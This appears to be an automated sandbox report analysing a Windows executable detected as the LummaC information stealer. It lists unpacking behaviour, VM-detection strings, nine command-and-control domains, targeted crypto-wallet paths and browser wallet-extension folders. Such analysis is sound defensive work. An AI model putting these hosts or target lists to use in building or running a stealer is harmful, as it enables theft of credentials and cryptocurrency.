            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: xNuh0DUJaG.exe, 00000003.00000003.1322241458.0000000003017000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1334614186.0000000003013000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1322061053.0000000003034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: xNuh0DUJaG.exeVirustotal: Detection: 48%
            Source: xNuh0DUJaG.exeReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile read: C:\Users\user\Desktop\xNuh0DUJaG.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\xNuh0DUJaG.exe "C:\Users\user\Desktop\xNuh0DUJaG.exe"
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 1804
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeUnpacked PE file: 3.2.xNuh0DUJaG.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeUnpacked PE file: 3.2.xNuh0DUJaG.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh3_2_00441853
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00483156 push ebx; ret 3_2_00483157
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0048512A pushad ; ret 3_2_0048512B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00485195 pushfd ; ret 3_2_00485196
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00483CFE push esi; retn 001Ch3_2_00483D02
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0212B05A push ebp; iretd 3_2_0212B05D
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02141AB7 push eax; mov dword ptr [esp], 0E0908DBh3_2_02141ABA
            Source: xNuh0DUJaG.exeStatic PE information: section name: .text entropy: 7.808585135243993
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exe TID: 7816Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: Amcache.hve.10.drBinary or memory string: VMware
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294448440.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: Amcache.hve.10.drBinary or memory string: vmci.sys
            Source: Amcache.hve.10.drBinary or memory string: VMware20,1
            Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
            Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334127564.00000000030B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
            Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
            Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294448440.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJ
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: xNuh0DUJaG.exe, 00000003.00000003.1334287609.000000000303B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeAPI call chain: ExitProcess graph end nodegraph_3-26155
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_004402C0 LdrInitializeThunk,3_2_004402C0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00480083 push dword ptr fs:[00000030h]3_2_00480083
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_0210092B mov eax, dword ptr fs:[00000030h]3_2_0210092B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_02100D90 mov eax, dword ptr fs:[00000030h]3_2_02100D90

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: xNuh0DUJaG.exeString found in binary or memory: robinsharez.shop
            Source: xNuh0DUJaG.exeString found in binary or memory: handscreamny.shop
            Source: xNuh0DUJaG.exeString found in binary or memory: chipdonkeruz.shop
            Source: xNuh0DUJaG.exeString found in binary or memory: versersleep.shop
            Source: xNuh0DUJaG.exeString found in binary or memory: crowdwarek.shop
            Source: xNuh0DUJaG.exeString found in binary or memory: apporholis.shop
            Source: xNuh0DUJaG.exeString found in binary or memory: femalsabler.shop
            Source: xNuh0DUJaG.exeString found in binary or memory: soundtappysk.shop
            Source: xNuh0DUJaG.exeString found in binary or memory: skidjazzyric.click
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: xNuh0DUJaG.exe PID: 7464, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertyoH
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: data%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
